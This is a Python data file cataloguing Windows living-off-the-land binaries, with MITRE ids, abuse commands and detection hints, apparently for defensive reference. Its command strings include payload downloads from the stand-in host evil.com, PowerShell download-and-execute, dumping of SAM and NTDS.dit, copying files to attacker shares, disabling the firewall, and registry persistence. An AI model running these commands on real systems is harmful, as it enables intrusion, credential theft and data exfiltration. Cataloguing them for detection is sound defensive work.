"""LOLBAS reference data — Living Off The Land Binaries, Scripts and Libraries.

Comprehensive catalogue of Windows system binaries that can be abused
by threat actors for download, execution, copy, reconnaissance, and
persistence operations.
"""

LOLBAS_DATA = [
    # === Download ===
    {"name": "Certutil.exe", "description": "Download files, encode/decode data, manage certificates", "category": "Download", "mitre_id": "T1105", "path": "C:\\Windows\\System32\\certutil.exe", "commands": ["certutil -urlcache -split -f http://evil.com/payload.exe out.exe", "certutil -encode input.txt encoded.b64", "certutil -decode encoded.b64 output.exe"], "detection": ["Process creation with certutil.exe and -urlcache or -encode", "Network connections from certutil.exe"], "os": "Windows"},
    {"name": "Bitsadmin.exe", "description": "BITS jobs for file download, upload, or execution", "category": "Download", "mitre_id": "T1197", "path": "C:\\Windows\\System32\\bitsadmin.exe", "commands": ["bitsadmin /transfer job /download /priority high http://evil.com/payload.exe C:\\out.exe", "bitsadmin /create 1 & bitsadmin /addfile 1 http://evil.com/file C:\\file & bitsadmin /resume 1"], "detection": ["Process creation: bitsadmin.exe with /transfer or /addfile", "BITS client event logs (Event ID 3, 59, 60, 61)"], "os": "Windows"},
    {"name": "Desktopimgdownldr.exe", "description": "Download files (part of Zoho ManageEngine)", "category": "Download", "mitre_id": "T1105", "path": "C:\\Program Files\\ManageEngine\\DesktopCentral_Agent\\", "commands": ["desktopimgdownldr.exe /url:http://evil.com/payload.exe /file:C:\\out.exe"], "detection": ["Process creation: desktopimgdownldr.exe with /url parameter"], "os": "Windows"},
    {"name": "Curl.exe", "description": "Command-line HTTP client for downloading payloads", "category": "Download", "mitre_id": "T1105", "path": "C:\\Windows\\System32\\curl.exe", "commands": ["curl -o C:\\temp\\payload.exe http://evil.com/payload.exe", "curl -s http://evil.com/script.ps1 | powershell -"], "detection": ["Process creation: curl.exe with -o or piped to interpreter", "Network connections from curl.exe to unusual domains"], "os": "Windows 10+"},
    {"name": "Finger.exe", "description": "Finger protocol client, can be used to download data over port 79", "category": "Download", "mitre_id": "T1105", "path": "C:\\Windows\\System32\\finger.exe", "commands": ["finger user@evil.com | more", "finger user@evil.com > C:\\temp\\payload.b64"], "detection": ["Process creation: finger.exe with unusual remote hosts", "Outbound connections on port 79"], "os": "Windows"},
    {"name": "Hh.exe", "description": "HTML Help executable, can download and execute remote CHM files", "category": "Download", "mitre_id": "T1218.001", "path": "C:\\Windows\\hh.exe", "commands": ["hh.exe http://evil.com/payload.chm", "hh.exe -decompile C:\\output malicious.chm"], "detection": ["Process creation: hh.exe with URL or -decompile arguments", "Network connections from hh.exe"], "os": "Windows"},
    {"name": "Ieexec.exe", "description": ".NET Framework executable that downloads and runs remote assemblies", "category": "Download", "mitre_id": "T1105", "path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe", "commands": ["ieexec.exe http://evil.com/payload.exe"], "detection": ["Process creation: ieexec.exe with URL argument", "Network connections from ieexec.exe"], "os": "Windows"},
    {"name": "Replace.exe", "description": "Replace files; can download alternate data streams", "category": "Download", "mitre_id": "T1105", "path": "C:\\Windows\\System32\\replace.exe", "commands": ["replace.exe \\\\attacker\\share\\payload.exe C:\\target /A"], "detection": ["Process creation: replace.exe with UNC paths", "SMB connections to unusual hosts"], "os": "Windows"},

    # === Execute ===
    {"name": "Mshta.exe", "description": "Execute .hta files or inline VBScript/JScript", "category": "Execute", "mitre_id": "T1218.005", "path": "C:\\Windows\\System32\\mshta.exe", "commands": ["mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -ep bypass\"\"\")(window.close)", "mshta http://evil.com/payload.hta"], "detection": ["Process creation: mshta.exe with command-line arguments", "Network connections from mshta.exe"], "os": "Windows"},
    {"name": "Regsvr32.exe", "description": "Register/unregister OLE controls, proxy execution of DLLs", "category": "Execute", "mitre_id": "T1218.010", "path": "C:\\Windows\\System32\\regsvr32.exe", "commands": ["regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll", "regsvr32 /s malicious.dll"], "detection": ["Process creation: regsvr32.exe with /i: parameter containing URL", "Network connections from regsvr32.exe"], "os": "Windows"},
    {"name": "Rundll32.exe", "description": "Execute DLL exports, proxy execution", "category": "Execute", "mitre_id": "T1218.011", "path": "C:\\Windows\\System32\\rundll32.exe", "commands": ["rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\"", "rundll32.exe shell32.dll,ShellExec_RunDLL \"cmd.exe\""], "detection": ["Process creation: rundll32.exe with unusual command-line arguments", "DLL loading from unusual paths"], "os": "Windows"},
    {"name": "Wmic.exe", "description": "WMI command-line interface for system enumeration, process execution", "category": "Execute", "mitre_id": "T1047", "path": "C:\\Windows\\System32\\wbem\\wmic.exe", "commands": ["wmic process call create \"cmd.exe /c whoami\"", "wmic /node:target process call create \"payload.exe\"", "wmic os get caption,version"], "detection": ["Process creation: wmic.exe with process call create", "WMI activity event logs (Event ID 5857-5861)"], "os": "Windows"},
    {"name": "Msiexec.exe", "description": "Install MSI packages, proxy execution", "category": "Execute", "mitre_id": "T1218.007", "path": "C:\\Windows\\System32\\msiexec.exe", "commands": ["msiexec /q /i http://evil.com/payload.msi", "msiexec /y malicious.dll"], "detection": ["Process creation: msiexec.exe with /q and URL", "MSI installer event logs (Event ID 1033, 1034, 11707, 11724)"], "os": "Windows"},
    {"name": "Cmstp.exe", "description": "Install connection manager profiles, bypass UAC and AppLocker", "category": "Execute", "mitre_id": "T1218.003", "path": "C:\\Windows\\System32\\cmstp.exe", "commands": ["cmstp.exe /ni /s malicious.inf"], "detection": ["Process creation: cmstp.exe with /ni /s parameters", "Unusual DLL loads from cmstp.exe"], "os": "Windows"},
    {"name": "InstallUtil.exe", "description": ".NET utility for installation/uninstallation, proxy execution", "category": "Execute", "mitre_id": "T1218.004", "path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", "commands": ["InstallUtil.exe /logfile= /LogToConsole=false /U malicious.dll"], "detection": ["Process creation: InstallUtil.exe with /U flag", ".NET assembly loading from unusual paths"], "os": "Windows"},
    {"name": "Forfiles.exe", "description": "Search for files and execute commands on results", "category": "Execute", "mitre_id": "T1202", "path": "C:\\Windows\\System32\\forfiles.exe", "commands": ["forfiles /p C:\\Windows\\System32 /m notepad.exe /c \"cmd /c calc.exe\""], "detection": ["Process creation: forfiles.exe with /c parameter executing suspicious commands"], "os": "Windows"},
    {"name": "Pcalua.exe", "description": "Program Compatibility Assistant, proxy execution", "category": "Execute", "mitre_id": "T1202", "path": "C:\\Windows\\System32\\pcalua.exe", "commands": ["pcalua.exe -a malicious.exe", "pcalua.exe -a cmd.exe -c \"whoami\""], "detection": ["Process creation: pcalua.exe with -a parameter"], "os": "Windows"},
    {"name": "Sc.exe", "description": "Service Control — create, start, stop, query Windows services", "category": "Execute", "mitre_id": "T1543.003", "path": "C:\\Windows\\System32\\sc.exe", "commands": ["sc create EvilSvc binPath= \"cmd.exe /c payload.exe\" start= auto", "sc \\\\target create RemoteSvc binPath= C:\\payload.exe"], "detection": ["Process creation: sc.exe with create or config", "Service creation event logs (Event ID 7045, 4697)"], "os": "Windows"},
    {"name": "Schtasks.exe", "description": "Schedule tasks for persistence or lateral movement", "category": "Execute", "mitre_id": "T1053.005", "path": "C:\\Windows\\System32\\schtasks.exe", "commands": ["schtasks /create /tn EvilTask /tr C:\\payload.exe /sc onlogon", "schtasks /create /s target /tn RemoteTask /tr C:\\payload.exe /sc once /st 12:00"], "detection": ["Process creation: schtasks.exe with /create", "Scheduled task creation event logs (Event ID 4698, 106)"], "os": "Windows"},
    {"name": "Cscript.exe", "description": "Windows Script Host — execute VBScript/JScript", "category": "Execute", "mitre_id": "T1059.005", "path": "C:\\Windows\\System32\\cscript.exe", "commands": ["cscript //nologo malicious.vbs", "cscript //E:jscript payload.js"], "detection": ["Process creation: cscript.exe with unusual script paths", "Script Block Logging (Event ID 4104)"], "os": "Windows"},
    {"name": "Wscript.exe", "description": "Windows Script Host GUI — execute VBScript/JScript", "category": "Execute", "mitre_id": "T1059.005", "path": "C:\\Windows\\System32\\wscript.exe", "commands": ["wscript malicious.vbs", "wscript //E:jscript payload.js"], "detection": ["Process creation: wscript.exe with unusual script files", "Script Block Logging (Event ID 4104)"], "os": "Windows"},
    {"name": "Mavinject.exe", "description": "Inject DLL into running process", "category": "Execute", "mitre_id": "T1218.013", "path": "C:\\Windows\\System32\\mavinject.exe", "commands": ["mavinject.exe <PID> /INJECTRUNNING C:\\malicious.dll"], "detection": ["Process creation: mavinject.exe with /INJECTRUNNING", "DLL injection events"], "os": "Windows"},
    {"name": "Msbuild.exe", "description": "Microsoft Build Engine — compile and execute inline C#/VB code", "category": "Execute", "mitre_id": "T1127.001", "path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe", "commands": ["msbuild.exe malicious.csproj", "msbuild.exe /p:Configuration=Release inline_task.xml"], "detection": ["Process creation: MSBuild.exe from unusual parent or location", "Child processes spawned by MSBuild.exe"], "os": "Windows"},
    {"name": "Regasm.exe", "description": ".NET assembly registration utility, proxy code execution", "category": "Execute", "mitre_id": "T1218.009", "path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe", "commands": ["regasm.exe /U malicious.dll"], "detection": ["Process creation: regasm.exe with /U flag", "Assembly loading from non-standard paths"], "os": "Windows"},
    {"name": "Regsvcs.exe", "description": ".NET COM+ registration, proxy code execution", "category": "Execute", "mitre_id": "T1218.009", "path": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe", "commands": ["regsvcs.exe malicious.dll"], "detection": ["Process creation: regsvcs.exe loading non-standard assemblies"], "os": "Windows"},
    {"name": "Odbcconf.exe", "description": "ODBC driver configuration, can execute DLLs via response files", "category": "Execute", "mitre_id": "T1218.008", "path": "C:\\Windows\\System32\\odbcconf.exe", "commands": ["odbcconf.exe /a {REGSVR malicious.dll}", "odbcconf.exe -f response.rsp"], "detection": ["Process creation: odbcconf.exe with REGSVR action or .rsp files", "DLL loads from unusual paths"], "os": "Windows"},
    {"name": "Msdeploy.exe", "description": "Web Deploy tool, can execute arbitrary commands", "category": "Execute", "mitre_id": "T1218", "path": "C:\\Program Files\\IIS\\Microsoft Web Deploy\\msdeploy.exe", "commands": ["msdeploy.exe -verb:sync -source:runCommand=\"cmd /c calc\""], "detection": ["Process creation: msdeploy.exe with -source:runCommand"], "os": "Windows"},
    {"name": "Bash.exe", "description": "Windows Subsystem for Linux bash shell", "category": "Execute", "mitre_id": "T1202", "path": "C:\\Windows\\System32\\bash.exe", "commands": ["bash.exe -c \"wget http://evil.com/payload -O /tmp/p && chmod +x /tmp/p && /tmp/p\"", "bash.exe -c \"cat /mnt/c/Windows/System32/config/SAM\""], "detection": ["Process creation: bash.exe or wsl.exe spawning from Windows processes", "Network connections from WSL processes"], "os": "Windows 10+"},
    {"name": "Cmd.exe", "description": "Windows Command Processor for arbitrary command execution", "category": "Execute", "mitre_id": "T1059.003", "path": "C:\\Windows\\System32\\cmd.exe", "commands": ["cmd /c powershell -ep bypass -f malicious.ps1", "cmd /c \"echo payload > C:\\temp\\out.exe\""], "detection": ["Process creation: cmd.exe with encoded commands or downloading", "Unusual parent-child process relationships"], "os": "Windows"},
    {"name": "PowerShell.exe", "description": "PowerShell scripting engine for post-exploitation", "category": "Execute", "mitre_id": "T1059.001", "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe", "commands": ["powershell -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://evil.com/ps1')\"", "powershell -enc <base64>"], "detection": ["Script Block Logging (Event ID 4104)", "PowerShell Module Logging (Event ID 4103)", "Process creation with -enc, -ep bypass, IEX, DownloadString"], "os": "Windows"},
    {"name": "Reg.exe", "description": "Registry command-line tool for persistence and credential access", "category": "Execute", "mitre_id": "T1112", "path": "C:\\Windows\\System32\\reg.exe", "commands": ["reg save HKLM\\SAM C:\\temp\\sam.hive", "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Evil /d C:\\payload.exe"], "detection": ["Process creation: reg.exe with save/add targeting Run keys or SAM", "Registry modification events (Event ID 4657)"], "os": "Windows"},
    {"name": "At.exe", "description": "Legacy task scheduler for persistence (deprecated but still present)", "category": "Execute", "mitre_id": "T1053.002", "path": "C:\\Windows\\System32\\at.exe", "commands": ["at 12:00 /every:M,T,W,Th,F C:\\payload.exe", "at \\\\target 12:00 C:\\payload.exe"], "detection": ["Process creation: at.exe with scheduling parameters", "Scheduled task events"], "os": "Windows"},
    {"name": "Control.exe", "description": "Control Panel host, can execute CPL files (DLLs)", "category": "Execute", "mitre_id": "T1218.002", "path": "C:\\Windows\\System32\\control.exe", "commands": ["control.exe malicious.cpl"], "detection": ["Process creation: control.exe loading non-standard .cpl files", "DLL loads from temp or user directories"], "os": "Windows"},
    {"name": "Dnscmd.exe", "description": "DNS Server management, can load arbitrary DLLs as plugins", "category": "Execute", "mitre_id": "T1543.003", "path": "C:\\Windows\\System32\\dnscmd.exe", "commands": ["dnscmd.exe dc1 /config /serverlevelplugindll \\\\attacker\\share\\evil.dll"], "detection": ["Process creation: dnscmd.exe with /serverlevelplugindll", "DNS service loading unusual DLLs"], "os": "Windows Server"},
    {"name": "Ftp.exe", "description": "FTP client that can execute local commands via ! prefix", "category": "Execute", "mitre_id": "T1202", "path": "C:\\Windows\\System32\\ftp.exe", "commands": ["echo !cmd.exe /c payload.exe > commands.txt & ftp -s:commands.txt"], "detection": ["Process creation: ftp.exe spawning child processes", "ftp.exe with -s flag pointing to script files"], "os": "Windows"},
    {"name": "Presentationhost.exe", "description": "XAML Browser Application host, execute .xbap files", "category": "Execute", "mitre_id": "T1218", "path": "C:\\Windows\\System32\\PresentationHost.exe", "commands": ["PresentationHost.exe http://evil.com/payload.xbap"], "detection": ["Process creation: PresentationHost.exe with URL or .xbap files", "Network connections from PresentationHost.exe"], "os": "Windows"},
    {"name": "Syncappvpublishingserver.exe", "description": "App-V publishing server, can execute PowerShell via argument injection", "category": "Execute", "mitre_id": "T1218", "path": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "commands": ["SyncAppvPublishingServer.exe \"n;Start-Process cmd\""], "detection": ["Process creation: SyncAppvPublishingServer.exe with semicolons in args", "PowerShell child process from SyncAppvPublishingServer"], "os": "Windows 10+"},
    {"name": "Te.exe", "description": "Test Authoring and Execution Framework from Windows SDK", "category": "Execute", "mitre_id": "T1218", "path": "C:\\Program Files (x86)\\Windows Kits\\10\\Testing\\Runtimes\\", "commands": ["te.exe malicious_test.dll"], "detection": ["Process creation: te.exe loading non-standard DLLs", "te.exe from non-SDK directories"], "os": "Windows"},

    # === Copy ===
    {"name": "Esentutl.exe", "description": "Database utility for copying locked files (e.g., SAM, NTDS.dit)", "category": "Copy", "mitre_id": "T1003.003", "path": "C:\\Windows\\System32\\esentutl.exe", "commands": ["esentutl.exe /y C:\\Windows\\NTDS\\ntds.dit /d C:\\temp\\ntds.dit /o", "esentutl.exe /y C:\\Windows\\System32\\config\\SAM /d C:\\temp\\SAM /o"], "detection": ["Process creation: esentutl.exe accessing sensitive files", "File access to SAM/NTDS/SECURITY hives"], "os": "Windows"},
    {"name": "Expand.exe", "description": "Extract compressed CAB files", "category": "Copy", "mitre_id": "T1140", "path": "C:\\Windows\\System32\\expand.exe", "commands": ["expand malicious.cab -F:* C:\\output\\"], "detection": ["Process creation: expand.exe from unusual parent processes"], "os": "Windows"},
    {"name": "Extrac32.exe", "description": "Extract CAB files, alternate to expand.exe", "category": "Copy", "mitre_id": "T1140", "path": "C:\\Windows\\System32\\extrac32.exe", "commands": ["extrac32 /Y /C http://evil.com/payload.cab C:\\out.exe"], "detection": ["Process creation: extrac32.exe with /Y and URL or unusual paths"], "os": "Windows"},
    {"name": "Xcopy.exe", "description": "Extended copy utility for bulk file exfiltration", "category": "Copy", "mitre_id": "T1570", "path": "C:\\Windows\\System32\\xcopy.exe", "commands": ["xcopy C:\\Users\\victim\\Documents \\\\attacker\\share\\ /s /e /h /y", "xcopy C:\\sensitive_data D:\\exfil /s /e"], "detection": ["Process creation: xcopy.exe targeting network shares or large directory trees", "Unusual file copy volumes"], "os": "Windows"},
    {"name": "Robocopy.exe", "description": "Robust file copy for mirroring directories for exfiltration", "category": "Copy", "mitre_id": "T1570", "path": "C:\\Windows\\System32\\robocopy.exe", "commands": ["robocopy C:\\Users\\victim\\Documents \\\\attacker\\share /MIR /R:0", "robocopy C:\\sensitive \\\\c2\\exfil /E /Z /NP"], "detection": ["Process creation: robocopy.exe with /MIR to external/unusual paths", "Large file transfers via SMB"], "os": "Windows"},

    # === Reconnaissance ===
    {"name": "Nltest.exe", "description": "Domain trust enumeration and DC discovery", "category": "Reconnaissance", "mitre_id": "T1482", "path": "C:\\Windows\\System32\\nltest.exe", "commands": ["nltest /dclist:domain.local", "nltest /domain_trusts", "nltest /dsgetdc:domain.local"], "detection": ["Process creation: nltest.exe with /dclist, /domain_trusts, or /dsgetdc", "Unusual LDAP queries from workstations"], "os": "Windows"},
    {"name": "Dsquery.exe", "description": "Directory Service query tool for AD enumeration", "category": "Reconnaissance", "mitre_id": "T1018", "path": "C:\\Windows\\System32\\dsquery.exe", "commands": ["dsquery computer -limit 0", "dsquery user -name * -limit 0", "dsquery group -name \"Domain Admins\""], "detection": ["Process creation: dsquery.exe from non-admin workstations", "LDAP queries for full directory listing"], "os": "Windows Server"},
    {"name": "Csvde.exe", "description": "CSV Directory Exchange for bulk AD export", "category": "Reconnaissance", "mitre_id": "T1087.002", "path": "C:\\Windows\\System32\\csvde.exe", "commands": ["csvde -f C:\\temp\\ad_export.csv", "csvde -f users.csv -r \"(objectClass=user)\""], "detection": ["Process creation: csvde.exe exporting to file", "Large LDAP read operations"], "os": "Windows Server"},
    {"name": "Ldifde.exe", "description": "LDIF Directory Exchange for AD data export/import", "category": "Reconnaissance", "mitre_id": "T1087.002", "path": "C:\\Windows\\System32\\ldifde.exe", "commands": ["ldifde -f C:\\temp\\ad_dump.ldf -d \"dc=domain,dc=local\"", "ldifde -f users.ldf -r \"(objectCategory=person)\""], "detection": ["Process creation: ldifde.exe exporting to file", "LDAP queries for large datasets"], "os": "Windows Server"},
    {"name": "Net.exe", "description": "Network utility for user, group, share enumeration and lateral movement", "category": "Reconnaissance", "mitre_id": "T1087.001", "path": "C:\\Windows\\System32\\net.exe", "commands": ["net user /domain", "net group \"Domain Admins\" /domain", "net share", "net use \\\\target\\c$ /user:domain\\admin password"], "detection": ["Process creation: net.exe with /domain, group, share, or use", "Logon events from net use (Event ID 4624 Type 3)"], "os": "Windows"},
    {"name": "Whoami.exe", "description": "Display current user, group, and privilege information", "category": "Reconnaissance", "mitre_id": "T1033", "path": "C:\\Windows\\System32\\whoami.exe", "commands": ["whoami /all", "whoami /priv", "whoami /groups"], "detection": ["Process creation: whoami.exe especially with /all or /priv flags", "Unusual user running whoami from non-interactive sessions"], "os": "Windows"},
    {"name": "Ipconfig.exe", "description": "Display network configuration for network discovery", "category": "Reconnaissance", "mitre_id": "T1016", "path": "C:\\Windows\\System32\\ipconfig.exe", "commands": ["ipconfig /all", "ipconfig /displaydns"], "detection": ["Process creation: ipconfig.exe from unusual contexts or scripts"], "os": "Windows"},
    {"name": "Arp.exe", "description": "Display and modify ARP cache for network mapping", "category": "Reconnaissance", "mitre_id": "T1016", "path": "C:\\Windows\\System32\\arp.exe", "commands": ["arp -a"], "detection": ["Process creation: arp.exe in combination with other recon tools"], "os": "Windows"},
    {"name": "Nslookup.exe", "description": "DNS lookup utility for domain enumeration", "category": "Reconnaissance", "mitre_id": "T1016", "path": "C:\\Windows\\System32\\nslookup.exe", "commands": ["nslookup -type=any domain.local", "nslookup -type=srv _ldap._tcp.dc._msdcs.domain.local"], "detection": ["Process creation: nslookup.exe with SRV or bulk queries", "Unusual DNS query patterns"], "os": "Windows"},
    {"name": "Systeminfo.exe", "description": "Display detailed system configuration information", "category": "Reconnaissance", "mitre_id": "T1082", "path": "C:\\Windows\\System32\\systeminfo.exe", "commands": ["systeminfo", "systeminfo /S target_host"], "detection": ["Process creation: systeminfo.exe from unusual contexts", "Remote systeminfo targeting other hosts"], "os": "Windows"},
    {"name": "Tasklist.exe", "description": "List running processes for defense evasion reconnaissance", "category": "Reconnaissance", "mitre_id": "T1057", "path": "C:\\Windows\\System32\\tasklist.exe", "commands": ["tasklist /v", "tasklist /S target_host", "tasklist /SVC"], "detection": ["Process creation: tasklist.exe especially with /S (remote) flag", "Enumeration of security products via tasklist"], "os": "Windows"},
    {"name": "Netsh.exe", "description": "Network shell for firewall config, interface enumeration, Wi-Fi password extraction", "category": "Reconnaissance", "mitre_id": "T1049", "path": "C:\\Windows\\System32\\netsh.exe", "commands": ["netsh wlan show profiles", "netsh wlan show profile name=SSID key=clear", "netsh advfirewall set allprofiles state off", "netsh interface portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.1 connectport=80"], "detection": ["Process creation: netsh.exe with wlan show, advfirewall, or portproxy", "Firewall rule changes (Event ID 4946, 4947)"], "os": "Windows"},
    {"name": "Netstat.exe", "description": "Display active connections and listening ports", "category": "Reconnaissance", "mitre_id": "T1049", "path": "C:\\Windows\\System32\\netstat.exe", "commands": ["netstat -ano", "netstat -b"], "detection": ["Process creation: netstat.exe from unusual contexts or automation"], "os": "Windows"},
    {"name": "Qwinsta.exe", "description": "Query Remote Desktop sessions for user enumeration", "category": "Reconnaissance", "mitre_id": "T1033", "path": "C:\\Windows\\System32\\qwinsta.exe", "commands": ["qwinsta /server:target", "query session /server:target"], "detection": ["Process creation: qwinsta.exe targeting remote hosts", "RDP session queries from non-admin tools"], "os": "Windows"},

    # === Persistence ===
    {"name": "Netsh.exe (Helper DLL)", "description": "Register persistent helper DLLs that load on netsh execution", "category": "Persistence", "mitre_id": "T1546.007", "path": "C:\\Windows\\System32\\netsh.exe", "commands": ["netsh add helper C:\\malicious_helper.dll"], "detection": ["Registry modification under HKLM\\SOFTWARE\\Microsoft\\NetSh", "DLL loads by netsh.exe from non-standard paths"], "os": "Windows"},
    {"name": "Winlogon Helper", "description": "Register DLLs/executables that run during Windows logon via Winlogon registry keys", "category": "Persistence", "mitre_id": "T1547.004", "path": "Registry", "commands": ["reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Shell /d \"explorer.exe,payload.exe\"", "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Userinit /d \"userinit.exe,payload.exe\""], "detection": ["Registry modification of Winlogon Shell or Userinit keys", "Event ID 4657 on Winlogon registry paths"], "os": "Windows"},
]

LOLBAS_CATEGORIES = sorted(set(b["category"] for b in LOLBAS_DATA))
